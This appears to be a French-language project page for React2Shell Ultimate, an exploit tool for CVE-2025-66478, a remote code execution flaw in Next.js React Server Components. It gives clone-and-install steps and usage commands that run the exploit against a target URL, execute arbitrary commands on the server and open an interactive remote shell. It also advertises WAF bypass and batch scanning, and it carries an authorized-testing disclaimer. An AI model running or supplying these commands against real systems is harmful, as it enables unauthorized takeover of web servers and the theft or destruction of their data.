
Scanner de vulnérabilité RCE RSC Next.js avec plusieurs modes de scan, contournement WAF, shell interactif et scan par lots pour les tests d'intrusion autorisés.
Scanner professionnel de vulnérabilités RCE RSC Next.js pour CVE-2025-66478
React2Shell Ultimate est un scanner complet de vulnérabilités pour CVE-2025-66478 - une vulnérabilité critique d'exécution de code à distance (RCE) affectant les applications Next.js utilisant React Server Components (RSC).
La version 2.0 apporte des améliorations majeures et des fonctionnalités professionnelles :
# Basic scan
python3 react2shell-ultimate.py -u https://target.com
# RCE mode
python3 react2shell-ultimate.py -u https://target.com --mode rce
# Execute command (God Mode)
python3 react2shell-ultimate.py -u https://target.com --exec "id"
# Interactive shell
python3 react2shell-ultimate.py -u https://target.com --shell
# Clone the repository
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate
# Install dependencies
pip3 install -r requirements.txt
# Make the script executable
chmod +x react2shell-ultimate.py
# Verify installation
python3 react2shell-ultimate.py --version
Prérequis :
Découvrez React2Shell Ultimate à travers notre interface web professionnelle :
Fonctionnalités web :
UNIQUEMENT POUR LES TESTS DE SÉCURITÉ AUTORISÉS
Cet outil est conçu pour :
Vous êtes entièrement responsable de toute utilisation abusive de cet outil.
Satyam Rastogi